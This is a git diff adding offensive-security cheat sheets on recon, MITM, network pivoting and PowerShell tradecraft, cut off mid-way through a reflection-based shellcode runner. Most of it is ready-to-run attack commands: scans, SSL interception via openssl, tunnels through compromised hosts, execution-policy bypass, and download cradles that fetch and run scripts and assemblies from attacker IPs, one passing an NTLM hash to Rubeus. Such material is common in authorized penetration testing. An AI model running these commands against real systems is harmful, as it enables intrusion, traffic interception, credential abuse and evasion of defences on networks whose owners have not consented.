+Not in one-liner version: +```bash +for i in `seq 1 255`; +do + ping -c 1 -w 1 192.168.1.$i > /dev/null 2>&1; + if [ $? -eq 0 ]; + then + echo "192.168.1.$i is UP:"; + for j in {21,22,80,139,443,445,3306,3389,8080,8443}; + do + nc -z -w 1 192.168.1.$i $j > /dev/null 2>&1; + if [ $? -eq 0 ]; + then + echo "\t192.168.1.$i has port $j open"; + fi ; + done ; + fi ; +done +``` + + +## Spyse +* Spyse API - for detailed info is better to check [Spyse](https://spyse.com/) + +* [Spyse Wrapper](https://github.com/zeropwn/spyse.py) + +#### Searching for subdomains +```bash +spyse -target xbox.com --subdomains +``` + +#### Reverse IP Lookup +```bash +spyse -target 52.14.144.171 --domains-on-ip +``` + +#### Searching for SSL certificates +```bash +spyse -target hotmail.com --ssl-certificates +``` +```bash +spyse -target "org: Microsoft" --ssl-certificates +``` +#### Getting all DNS records +```bash +spyse -target xbox.com --dns-all +``` + +## Masscan + +```powershell +masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out +masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000 + +# find machines on the network +sudo masscan --rate 500 --interface tap0 --router-ip $ROUTER_IP --top-ports 100 $NETWORK -oL masscan_machines.tmp +cat masscan_machines.tmp | grep open | cut -d " " -f4 | sort -u > masscan_machines.lst + +# find open ports for one machine +sudo masscan --rate 1000 --interface tap0 --router-ip $ROUTER_IP -p1-65535,U:1-65535 $MACHINE_IP --banners -oL $MACHINE_IP/scans/masscan-ports.lst + + +# TCP grab banners and services information +TCP_PORTS=$(cat $MACHINE_IP/scans/masscan-ports.lst| grep open | grep tcp | cut -d " " -f3 | tr '\n' ',' | head -c -1) +[ "$TCP_PORTS" ] && sudo nmap -sT -sC -sV -v -Pn -n -T4 -p$TCP_PORTS --reason --version-intensity=5 -oA $MACHINE_IP/scans/nmap_tcp $MACHINE_IP + +# UDP grab banners and services information +UDP_PORTS=$(cat $MACHINE_IP/scans/masscan-ports.lst| grep open | grep udp | cut -d " " -f3 | tr '\n' ',' | head -c -1) +[ "$UDP_PORTS" ] && sudo nmap -sU -sC -sV -v -Pn -n -T4 -p$UDP_PORTS --reason --version-intensity=5 -oA $MACHINE_IP/scans/nmap_udp $MACHINE_IP +``` + +## Reconnoitre + +Dependencies: + +* nbtscan +* nmap + +```powershell +python2.7 ./reconnoitre.py -t 192.168.1.2-252 -o ./results/ --pingsweep --hostnames --services --quick +``` + +If you have a segfault with nbtscan, read the following quote. +> Permission is denied on the broadcast address (.0) and it segfaults on the gateway (.1) - all other addresses seem fine here.So to mitigate the problem: nbtscan 192.168.0.2-255 + +## Netdiscover + +```powershell +netdiscover -i eth0 -r 192.168.1.0/24 +Currently scanning: Finished! | Screen View: Unique Hosts + +20 Captured ARP Req/Rep packets, from 4 hosts. Total size: 876 +_____________________________________________________________________________ +IP At MAC Address Count Len MAC Vendor / Hostname +----------------------------------------------------------------------------- +192.168.1.AA 68:AA:AA:AA:AA:AA 15 630 Sagemcom +192.168.1.XX 52:XX:XX:XX:XX:XX 1 60 Unknown vendor +192.168.1.YY 24:YY:YY:YY:YY:YY 1 60 QNAP Systems, Inc. +192.168.1.ZZ b8:ZZ:ZZ:ZZ:ZZ:ZZ 3 126 HUAWEI TECHNOLOGIES CO.,LTD +``` + +## Responder + +```powershell +responder -I eth0 -A # see NBT-NS, BROWSER, LLMNR requests without responding. +responder.py -I eth0 -wrf +``` + +Alternatively you can use the [Windows version](https://github.com/lgandx/Responder-Windows) + +## Bettercap + +```powershell +bettercap -X --proxy --proxy-https -T +# better cap in spoofing, discovery, sniffer +# intercepting http and https requests, +# targetting specific IP only +``` + +## SSL MITM with OpenSSL +This code snippet allows you to sniff/modify SSL traffic if there is a MITM vulnerability using only openssl. +If you can modify `/etc/hosts` of the client: +```powershell +sudo echo "[OPENSSL SERVER ADDRESS] [domain.of.server.to.mitm]" >> /etc/hosts # On client host +``` +On our MITM server, if the client accepts self signed certificates (you can use a legit certificate if you have the private key of the legit server): +```powershell +openssl req -subj '/CN=[domain.of.server.to.mitm]' -batch -new -x509 -days 365 -nodes -out server.pem -keyout server.pem +``` +On our MITM server, we setup our infra: +```powershell +mkfifo response +sudo openssl s_server -cert server.pem -accept [INTERFACE TO LISTEN TO]:[PORT] -quiet < response | tee | openssl s_client -quiet -servername [domain.of.server.to.mitm] -connect[IP of server to MITM]:[PORT] | tee | cat > response +``` +In this example, traffic is only displayed with `tee` but we could modify it using `sed` for example. + +## References + +* [TODO](TODO) diff --git a/docs/pentest/Network Pivoting Techniques.md b/docs/pentest/Network Pivoting Techniques.md new file mode 100644 index 0000000..11669b6 --- /dev/null +++ b/docs/pentest/Network Pivoting Techniques.md @@ -0,0 +1,503 @@ +# Network Pivoting Techniques + +## Summary + +* [SOCKS Compatibility Table](#socks-compatibility-table) +* [Windows netsh Port Forwarding](#windows-netsh-port-forwarding) +* [SSH](#ssh) + * [SOCKS Proxy](#socks-proxy) + * [Local Port Forwarding](#local-port-forwarding) + * [Remote Port Forwarding](#remote-port-forwarding) +* [Proxychains](#proxychains) +* [Graftcp](#graftcp) +* [Web SOCKS - reGeorg](#web-socks---regeorg) +* [Web SOCKS - pivotnacci](#web-socks---pivotnacci) +* [Metasploit](#metasploit) +* [sshuttle](#sshuttle) +* [chisel](#chisel) + * [SharpChisel](#sharpchisel) +* [gost](#gost) +* [Rpivot](#rpivot) +* [RevSocks](#revsocks) +* [plink](#plink) +* [ngrok](#ngrok) +* [Capture a network trace with builtin tools](#capture-a-network-trace-with-builtin-tools) +* [Basic Pivoting Types](#basic-pivoting-types) + * [Listen - Listen](#listen---listen) + * [Listen - Connect](#listen---connect) + * [Connect - Connect](#connect---connect) +* [References](#references) + + +## SOCKS Compatibility Table + +| SOCKS Version | TCP | UDP | IPv4 | IPv6 | Hostname | +| ------------- | :---: | :---: | :---: | :---: | :---: | +| SOCKS v4 | ✅ | ❌ | ✅ | ❌ | ❌ | +| SOCKS v4a | ✅ | ❌ | ✅ | ❌ | ✅ | +| SOCKS v5 | ✅ | ✅ | ✅ | ✅ | ✅ | + + +## Windows netsh Port Forwarding + +```powershell +netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport +netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110 + +# Forward the port 4545 for the reverse shell, and the 80 for the http server for example +netsh interface portproxy add v4tov4 listenport=4545 connectaddress=192.168.50.44 connectport=4545 +netsh interface portproxy add v4tov4 listenport=80 connectaddress=192.168.50.44 connectport=80 +# Correctly open the port on the machine +netsh advfirewall firewall add rule name="PortForwarding 80" dir=in action=allow protocol=TCP localport=80 +netsh advfirewall firewall add rule name="PortForwarding 80" dir=out action=allow protocol=TCP localport=80 +netsh advfirewall firewall add rule name="PortForwarding 4545" dir=in action=allow protocol=TCP localport=4545 +netsh advfirewall firewall add rule name="PortForwarding 4545" dir=out action=allow protocol=TCP localport=4545 + +``` + +1. listenaddress – is a local IP address waiting for a connection. +2. listenport – local listening TCP port (the connection is waited on it). +3. connectaddress – is a local or remote IP address (or DNS name) to which the incoming connection will be redirected. +4. connectport – is a TCP port to which the connection from listenport is forwarded to. + +## SSH + +### SOCKS Proxy + +```bash +ssh -D8080 [user]@[host] + +ssh -N -f -D 9000 [user]@[host] +-f : ssh in background +-N : do not execute a remote command +``` + +Cool Tip : Konami SSH Port forwarding + +```bash +[ENTER] + [~C] +-D 1090 +``` + +### Local Port Forwarding + +```bash +ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host] +``` + +### Remote Port Forwarding + +```bash +ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host] +ssh -R 3389:10.1.1.224:3389 root@10.11.0.32 +``` + +## Proxychains + +**Config file**: /etc/proxychains.conf + +```bash +[ProxyList] +socks4 localhost 8080 +``` + +Set the SOCKS4 proxy then `proxychains nmap -sT 192.168.5.6` + +## Graftcp + +> A flexible tool for redirecting a given program's TCP traffic to SOCKS5 or HTTP proxy. + +:warning: Same as proxychains, with another mechanism to "proxify" which allow Go applications. + +```ps1 +# https://github.com/hmgle/graftcp + +# Create a SOCKS5, using Chisel or another tool and forward it through SSH +(attacker) $ ssh -fNT -i /tmp/id_rsa -L 1080:127.0.0.1:1080 root@IP_VPS +(vps) $ ./chisel server --tls-key ./key.pem --tls-cert ./cert.pem -p 8443 -reverse +(victim 1) $ ./chisel client --tls-skip-verify https://IP_VPS:8443 R:socks + +# Run graftcp and specify the SOCKS5 +(attacker) $ graftcp-local -listen :2233 -logfile /tmp/toto -loglevel 6 -socks5 127.0.0.1:1080 +(attacker) $ graftcp ./nuclei -u http://172.16.1.24 +``` + +Simple configuration file for graftcp + +```py +# https://github.com/hmgle/graftcp/blob/master/local/example-graftcp-local.conf +## Listen address (default ":2233") +listen = :2233 +loglevel = 1 + +## SOCKS5 address (default "127.0.0.1:1080") +socks5 = 127.0.0.1:1080 +# socks5_username = SOCKS5USERNAME +# socks5_password = SOCKS5PASSWORD + +## Set the mode for select a proxy (default "auto") +select_proxy_mode = auto +``` + + +## Web SOCKS - reGeorg + +[reGeorg](https://github.com/sensepost/reGeorg), the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn. + +Drop one of the following files on the server: + +- tunnel.ashx +- tunnel.aspx +- tunnel.js +- tunnel.jsp +- tunnel.nosocket.php +- tunnel.php +- tunnel.tomcat.5.jsp + +```python +python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp # the socks proxy will be on port 8080 + +optional arguments: + -h, --help show this help message and exit + -l , --listen-on The default listening address + -p , --listen-port The default listening port + -r , --read-buff Local read buffer, max data to be sent per POST + -u , --url The url containing the tunnel script + -v , --verbose Verbose output[INFO|DEBUG] +``` + +## Web SOCKS - pivotnacci + +[pivotnacci](https://github.com/blackarrowsec/pivotnacci), a tool to make socks connections through HTTP agents. + +```powershell +pip3 install pivotnacci +pivotnacci https://domain.com/agent.php --password "s3cr3t" +pivotnacci https://domain.com/agent.php --polling-interval 2000 +``` + + +## Metasploit + +```powershell +# Meterpreter list active port forwards +portfwd list + +# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell +portfwd add –l 3389 –p 3389 –r target-host +portfwd add -l 88 -p 88 -r 127.0.0.1 +portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445 + +# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell +portfwd delete –l 3389 –p 3389 –r target-host +# Meterpreter delete all port forwards +portfwd flush + +or + +# Use Meterpreters autoroute script to add the route for specified subnet 192.168.15.0 +run autoroute -s 192.168.15.0/24 +use auxiliary/server/socks_proxy +set SRVPORT 9090 +set VERSION 4a +# or +use auxiliary/server/socks4a # (deprecated) + + +# Meterpreter list all active routes +run autoroute -p + +route #Meterpreter view available networks the compromised host can access +# Meterpreter add route for 192.168.14.0/24 via Session number. +route add 192.168.14.0 255.255.255.0 3 +# Meterpreter delete route for 192.168.14.0/24 via Session number. +route delete 192.168.14.0 255.255.255.0 3 +# Meterpreter delete all routes +route flush +``` + +## Empire + +```powershell +(Empire) > socksproxyserver +(Empire) > use module management/invoke_socksproxy +(Empire) > set remoteHost 10.10.10.10 +(Empire) > run +``` + +## sshuttle + +Transparent proxy server that works as a poor man's VPN. Forwards over ssh. + +* Doesn't require admin. +* Works with Linux and MacOS. +* Supports DNS tunneling. + +```powershell +pacman -Sy sshuttle +apt-get install sshuttle +sshuttle -vvr user@10.10.10.10 10.1.1.0/24 +sshuttle -vvr username@pivot_host 10.2.2.0/24 + +# using a private key +$ sshuttle -vvr root@10.10.10.10 10.1.1.0/24 -e "ssh -i ~/.ssh/id_rsa" + +# -x == exclude some network to not transmit over the tunnel +# -x x.x.x.x.x/24 +``` + +## chisel + + +```powershell +go get -v github.com/jpillora/chisel + +# forward port 389 and 88 to hacker computer +user@hacker$ /opt/chisel/chisel server -p 8008 --reverse +user@victim$ .\chisel.exe client YOUR_IP:8008 R:88:127.0.0.1:88 R:389:localhost:389 + +# SOCKS +user@victim$ .\chisel.exe client YOUR_IP:8008 R:socks +``` + +### SharpChisel + +A C# Wrapper of Chisel : https://github.com/shantanu561993/SharpChisel + +```powershell +user@hacker$ ./chisel server -p 8080 --key "private" --auth "user:pass" --reverse --proxy "https://www.google.com" +================================================================ +server : run the Server Component of chisel +-p 8080 : run server on port 8080 +--key "private": use "private" string to seed the generation of a ECDSA public and private key pair +--auth "user:pass" : Creds required to connect to the server +--reverse: Allow clients to specify reverse port forwarding remotes in addition to normal remotes. +--proxy https://www.google.com : Specifies another HTTP server to proxy requests to when chisel receives a normal HTTP request. Useful for hiding chisel in plain sight. + +user@victim$ SharpChisel.exe client --auth user:pass https://redacted.cloudfront.net R:1080:socks +``` + +## Ligolo + +Ligolo : Reverse Tunneling made easy for pentesters, by pentesters + + +1. Build Ligolo + ```powershell + # Get Ligolo and dependencies + cd `go env GOPATH`/src + git clone https://github.com/sysdream/ligolo + cd ligolo + make dep + + # Generate self-signed TLS certificates (will be placed in the certs folder) + make certs TLS_HOST=example.com + + make build-all + ``` +2. Use Ligolo + ```powershell + # On your attack server. + ./bin/localrelay_linux_amd64 + + # On the compromise host. + ligolo_windows_amd64.exe -relayserver LOCALRELAYSERVER:5555 + ``` + +## Gost + +> Wiki English : https://docs.ginuerzh.xyz/gost/en/ + +```powershell +git clone https://github.com/ginuerzh/gost +cd gost/cmd/gost +go build + +# Socks5 Proxy +Server side: gost -L=socks5://:1080 +Client side: gost -L=:8080 -F=socks5://server_ip:1080?notls=true + +# Local Port Forward +gost -L=tcp://:2222/192.168.1.1:22 [-F=..] +``` + +## Rpivot + +Server (Attacker box) + +```python +python server.py --proxy-port 1080 --server-port 9443 --server-ip 0.0.0.0 +``` + +Client (Compromised box) + +```python +python client.py --server-ip --server-port 9443 +``` + +Through corporate proxy + +```python +python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \ +--ntlm-proxy-port 8080 --domain CORP --username jdoe --password 1q2w3e +``` + +Passing the hash + +```python +python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \ +--ntlm-proxy-port 8080 --domain CORP --username jdoe \ +--hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE +``` + +## revsocks + +```powershell +# Listen on the server and create a SOCKS 5 proxy on port 1080 +user@VPS$ ./revsocks -listen :8443 -socks 127.0.0.1:1080 -pass Password1234 + +# Connect client to the server +user@PC$ ./revsocks -connect 10.10.10.10:8443 -pass Password1234 +user@PC$ ./revsocks -connect 10.10.10.10:8443 -pass Password1234 -proxy proxy.domain.local:3128 -proxyauth Domain/userpame:userpass -useragent "Mozilla 5.0/IE Windows 10" +``` + + +```powershell +# Build for Linux +git clone https://github.com/kost/revsocks +export GOPATH=~/go +go get github.com/hashicorp/yamux +go get github.com/armon/go-socks5 +go get github.com/kost/go-ntlmssp +go build +go build -ldflags="-s -w" && upx --brute revsocks + +# Build for Windows +go get github.com/hashicorp/yamux +go get github.com/armon/go-socks5 +go get github.com/kost/go-ntlmssp +GOOS=windows GOARCH=amd64 go build -ldflags="-s -w" +go build -ldflags -H=windowsgui +upx revsocks +``` + + +## plink + +```powershell +# exposes the SMB port of the machine in the port 445 of the SSH Server +plink -l root -pw toor -R 445:127.0.0.1:445 +# exposes the RDP port of the machine in the port 3390 of the SSH Server +plink -l root -pw toor ssh-server-ip -R 3390:127.0.0.1:3389 + +plink -l root -pw mypassword 192.168.18.84 -R +plink.exe -v -pw mypassword user@10.10.10.10 -L 6666:127.0.0.1:445 + +plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP] +# redirects the Windows port 445 to Kali on port 22 +plink -P 22 -l root -pw some_password -C -R 445:127.0.0.1:445 192.168.12.185 +``` + +## ngrok + +```powershell +# get the binary +wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip +unzip ngrok-stable-linux-amd64.zip + +# log into the service +./ngrok authtoken 3U[REDACTED_TOKEN]Hm + +# deploy a port forwarding for 4433 +./ngrok http 4433 +./ngrok tcp 4433 +``` + +## cloudflared + +```bash +# Get the binary +wget https://bin.equinox.io/c/VdrWdbjqyF/cloudflared-stable-linux-amd64.tgz +tar xvzf cloudflared-stable-linux-amd64.tgz +# Expose accessible internal service to the internet +./cloudflared tunnel --url ://: +``` + +## Capture a network trace with builtin tools + +* Windows (netsh) + ```ps1 + # start a capture use the netsh command. + netsh trace start capture=yes report=disabled tracefile=c:\trace.etl maxsize=16384 + + # stop the trace + netsh trace stop + + # Event tracing can be also used across a reboots + netsh trace start capture=yes report=disabled persistent=yes tracefile=c:\trace.etl maxsize=16384 + + # To open the file in Wireshark you have to convert the etl file to the cap file format. Microsoft has written a convert for this task. Download the latest version. + etl2pcapng.exe c:\trace.etl c:\trace.pcapng + + # Use filters + netsh trace start capture=yes report=disabled Ethernet.Type=IPv4 IPv4.Address=10.200.200.3 tracefile=c:\trace.etl maxsize=16384 + ``` +* Linux (tcpdump) + ```ps1 + sudo apt-get install tcpdump + tcpdump -w 0001.pcap -i eth0 + tcpdump -A -i eth0 + + # capture every TCP packet + tcpdump -i eth0 tcp + + # capture everything on port 22 + tcpdump -i eth0 port 22 + ``` + + +## Basic Pivoting Types + +| Type | Use Case | +| :------------- | :------------------------------------------ | +| Listen - Listen | Exposed asset, may not want to connect out. | +| Listen - Connect | Normal redirect. | +| Connect - Connect | Can’t bind, so connect to bridge two hosts | + +### Listen - Listen + +| Type | Use Case | +| :------------- | :------------------------------------------ | +| ncat | `ncat -v -l -p 8080 -c "ncat -v -l -p 9090"`| +| socat | `socat -v tcp-listen:8080 tcp-listen:9090` | +| remote host 1 | `ncat localhost 8080 < file` | +| remote host 2 | `ncat localhost 9090 > newfile` | + +### Listen - Connect + +| Type | Use Case | +| :------------- | :------------------------------------------ | +| ncat | `ncat -l -v -p 8080 -c "ncat localhost 9090"` | +| socat | `socat -v tcp-listen:8080,reuseaddr tcp-connect:localhost:9090` | +| remote host 1 | `ncat localhost -p 8080 < file` | +| remote host 2 | `ncat -l -p 9090 > newfile` | + +### Connect - Connect + +| Type | Use Case | +| :------------- | :------------------------------------------ | +| ncat | `ncat localhost 8080 -c "ncat localhost 9090"` | +| socat | `socat -v tcp-connect:localhost:8080,reuseaddr tcp-connect:localhost:9090` | +| remote host 1 | `ncat -l -p 8080 < file` | +| remote host 2 | `ncat -l -p 9090 > newfile` | + +## References + +* [Port Forwarding in Windows - Windows OS Hub](http://woshub.com/port-forwarding-in-windows/) +* [Using the SSH "Konami Code" (SSH Control Sequences) - Jeff McJunkin](https://pen-testing.sans.org/blog/2015/11/10/protected-using-the-ssh-konami-code-ssh-control-sequences) +* [A Red Teamer's guide to pivoting- Mar 23, 2017 - Artem Kondratenko](https://artkond.com/2017/03/23/pivoting-guide/) +* [Pivoting Meterpreter](https://www.information-security.fr/pivoting-meterpreter/) +* 🇫🇷 [Etat de l’art du pivoting rĂŠseau en 2019 - Oct 28,2019 - Alexandre ZANNI](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/) - 🇺🇸 [Overview of network pivoting and tunneling [2022 updated] - Alexandre ZANNI](https://blog.raw.pm/en/state-of-the-art-of-network-pivoting-in-2019/) +* [Red Team: Using SharpChisel to exfil internal network - Shantanu Khandelwal - Jun 8](https://medium.com/@shantanukhande/red-team-using-sharpchisel-to-exfil-internal-network-e1b07ed9b49) +* [Active Directory - hideandsec](https://hideandsec.sh/books/cheatsheets-82c/page/active-directory) +* [Windows: Capture a network trace with builtin tools (netsh) - February 22, 2021 Michael Albert](https://michlstechblog.info/blog/windows-capture-a-network-trace-with-builtin-tools-netsh/) \ No newline at end of file diff --git a/docs/pentest/Powershell - Cheatsheet.md b/docs/pentest/Powershell - Cheatsheet.md new file mode 100644 index 0000000..7695733 --- /dev/null +++ b/docs/pentest/Powershell - Cheatsheet.md @@ -0,0 +1,333 @@ +# Powershell + +## Summary + +- [Powershell](#powershell) + - [Summary](#summary) + - [Execution Policy](#execution-policy) + - [Encoded Commands](#encoded-commands) + - [Constrained Mode](#constrained-mode) + - [Encoded Commands](#encoded-commands) + - [Download file](#download-file) + - [Load Powershell scripts](#load-powershell-scripts) + - [Load C# assembly reflectively](#load-c-assembly-reflectively) + - [Call Win API using delegate functions with Reflection](#call-win-api-using-delegate-functions-with-reflection) + - [Resolve address functions](#resolve-address-functions) + - [DelegateType Reflection](#delegatetype-reflection) + - [Example with a simple shellcode runner](#example-with-a-simple-shellcode-runner) + - [Secure String to Plaintext](#secure-string-to-plaintext) + - [References](#references) + +## Execution Policy + +```ps1 +powershell -EncodedCommand $encodedCommand +powershell -ep bypass ./PowerView.ps1 + +# Change execution policy +Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted +Set-ExecutionPolicy Bypass -Scope Process +``` + +## Constrained Mode + +```ps1 +# Check if we are in a constrained mode +# Values could be: FullLanguage or ConstrainedLanguage +$ExecutionContext.SessionState.LanguageMode + +## Bypass +powershell -version 2 +``` + +## Encoded Commands + +* Windows + ```ps1 + $command = 'IEX (New-Object Net.WebClient).DownloadString("http://10.10.10.10/PowerView.ps1")' + $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) + $encodedCommand = [Convert]::ToBase64String($bytes) + ``` +* Linux: :warning: UTF-16LE encoding is required + ```ps1 + echo 'IEX (New-Object Net.WebClient).DownloadString("http://10.10.10.10/PowerView.ps1")' | iconv -t utf-16le | base64 -w 0 + ``` + +## Download file + +```ps1 +# Any version +(New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/PowerView.ps1", "C:\Windows\Temp\PowerView.ps1") +wget "http://10.10.10.10/taskkill.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe" +Import-Module BitsTransfer; Start-BitsTransfer -Source $url -Destination $output + +# Powershell 4+ +IWR "http://10.10.10.10/binary.exe" -OutFile "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\binary.exe" +Invoke-WebRequest "http://10.10.10.10/binary.exe" -OutFile "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\binary.exe" +``` + +## Load Powershell scripts + +```ps1 +# Proxy-aware +IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/PowerView.ps1') +echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10/PowerView.ps1') | powershell -noprofile - +powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.10.10.10/PowerView.ps1')|iex" + +# Non-proxy aware +$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://10.10.10.10/PowerView.ps1',$false);$h.send();iex $h.responseText +``` + +## Load C# assembly reflectively + +```powershell +# Download and run assembly without arguments +$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.16.7/rev.exe') +$assem = [System.Reflection.Assembly]::Load($data) +[rev.Program]::Main() + +# Download and run Rubeus, with arguments (make sure to split the args) +$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.16.7/Rubeus.exe') +$assem = [System.Reflection.Assembly]::Load($data) +[Rubeus.Program]::Main("s4u /user:web01$ /rc4:1d77f43d9604e79e5626c6905705801e /impersonateuser:administrator /msdsspn:cifs/file01 /ptt".Split()) + +# Execute a specific method from an assembly (e.g. a DLL) +$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.16.7/lib.dll') +$assem = [System.Reflection.Assembly]::Load($data) +$class = $assem.GetType("ClassLibrary1.Class1") +$method = $class.GetMethod("runner") +$method.Invoke(0, $null) +``` + +## Call Win API using delegate functions with Reflection + +### Resolve address functions + +To perform reflection we first need to obtain `GetModuleHandle` and `GetProcAdresse` to be able to lookup of Win32 API function addresses. + +To retrieve those function we will need to find out if there are included inside the existing loaded Assemblies. +```powershell +# Retrieve all loaded Assemblies +$Assemblies = [AppDomain]::CurrentDomain.GetAssemblies() + +Iterate over all the Assemblies, to retrieve all the Static and Unsafe Methods +$Assemblies | + ForEach-Object { + $_.GetTypes()| + ForEach-Object { + $_ | Get-Member -Static| Where-Object { + $_.TypeName.Contains('Unsafe') + } + } 2> $nul l +``` +We want to find where the Assemblies are located, so we will use the statement `Location`. Then we will look for all the methods inside the Assembly `Microsoft.Win32.UnsafeNativeMethods` +TBN: `GetModuleHandle` and `GetProcAddress` are located in `C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll` + +If we want to use those function we need in a first time get a reference to the .dll file we need the object to have the property `GlobalAssemblyCache` set (The Global Assembly Cache is essentially a list of all native and registered assemblies on Windows, which will allow us to filter out non-native assemblies). The second filter is to retrieve the `System.dll`. +```powershell +$systemdll = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { + $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') +}) + +$unsafeObj = $systemdll.GetType('Microsoft.Win32.UnsafeNativeMethods') +``` + +To retrieve the method `GetModuleHandle`, we can use the method `GetMethod()` to retrieve it. +`$GetModuleHandle = $unsafeObj.GetMethod('GetModuleHandle')` + +Now we can use the `Invoke` method of our object `$GetModuleHandle` to get a reference of an unmanaged DLL. +Invoke takes two arguments and both are objects: +* The first argument is the object to invoke it on but since we use it on a static method we may set it to "$null". +* The second argument is an array consisting of the arguments for the method we are invoking (GetModuleHandle). Since the Win32 API only takes the name of the DLL as a string we only need to supply that. +`$GetModuleHandle.Invoke($null, @("user32.dll"))` + +However, we want to use the same method to use the function `GetProcAddress`, it won't work due to the fact that our `System.dll` object retrieved contains multiple occurences of the method `GetProcAddress`. Therefore the internal method `GetMethod()` will throw an error `"Ambiguous match found."`. + +Therefore we will use the method `GetMethods()` to get all the available methods and then iterate over them to retrieve only those we want. +```powershell +$unsafeObj.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$_}} +``` + +If we want to get the `GetProcAddress` reference, we will construct an array to store our matching object and use the first entry. + +```powershell +$unsafeObj.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}} +$GetProcAddress = $tmp[0] +``` + +We need to take the first one, because the arguments type of the second one does not match with ours. + +Alternatively we can use `GetMethod` function to precise the argument types that we want. +```powershell +$GetProcAddress = $unsafeObj.GetMethod('GetProcAddress', + [reflection.bindingflags]'Public,Static', + $null, + [System.Reflection.CallingConventions]::Any, + @([System.IntPtr], [string]), + $null); +``` +cf: [https://learn.microsoft.com/en-us/dotnet/api/system.type.getmethod?view=net-7.0](https://learn.microsoft.com/en-us/dotnet/api/system.type.getmethod?view=net-7.0) + +Now we have everything to resolve any function address we want. +```powershell +$user32 = $GetModuleHandle.Invoke($null, @("user32.dll")) +$tmp=@() +$unsafeObj.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}} +$GetProcAddress = $tmp[0] +$GetProcAddress.Invoke($null, @($user32, "MessageBoxA")) +``` + +If we put everything in a function: +```powershell +function LookupFunc { + + Param ($moduleName, $functionName) + + $assem = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') + $tmp=@() + $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}} + return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null, @($moduleName)), $functionName)) +} +``` + +### DelegateType Reflection + +To be able to use the function that we have retrieved the address, we need to pair the information about the number of arguments and their associated data types with the resolved function memory address. This is done through `DelegateType`. +The DelegateType Reflection consists in manually create an assembly in memory and populate it with content. + +The first step is to create a new assembly with the class `AssemblyName` and assign it a name. +```powershell +$MyAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate') +``` +Now we want to set permission on our Assembly. We need to set it to executable and to not be saved to the disk. For that the method `DefineDynamicAssembly` will be used. +```powershell +$Domain = [AppDomain]::CurrentDomain +$MyAssemblyBuilder = $Domain.DefineDynamicAssembly($MyAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) +``` +Now that everything is set, we can start creating content inside our assembly. First, we will need to create the main building block which is a Module. This can be done through the method `DefineDynamicModule` +The method need a custom name as the first argument and a boolean indicating if we want to include symbols or not. +```powershell +$MyModuleBuilder = $MyAssemblyBuilder.DefineDynamicModule('InMemoryModule', $false) +``` +The next step consists by creating a custom type that will become our delegate type. It can be done with the method `DefineType`. +The arguments are: +* a custom name +* the attributes of the type +* the type it build on top of +```powershell +$MyTypeBuilder = $MyModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) +``` +Then we will need to set the prototype of our function. +First we need to use the method `DefineConstructor` to define a constructor. The method takes three arguments: +* the attributes of the constructor +* calling convention +* the parameter types of the constructor that will become the function prototype +```powershell +$MyConstructorBuilder = $MyTypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', + [System.Reflection.CallingConventions]::Standard, + @([IntPtr], [String], [String], [int])) +``` +Then we need to set some implementation flags with the method `SetImplementationFlags`. +```powershell +$MyConstructorBuilder.SetImplementationFlags('Runtime, Managed') +``` +To be able to call our function, we need to define the `Invoke` method in our delegate type. For that the method `DefineMethod` allows us to do that. +The method takes four arguments: +* name of the method defined +* method attributes +* return type +* array of argument types +```powershell +$MyMethodBuilder = $MyTypeBuilder.DefineMethod('Invoke', + 'Public, HideBySig, NewSlot, Virtual', + [int], + @([IntPtr], [String], [String], [int])) +``` +If we put everything in a function: +```powershell +function 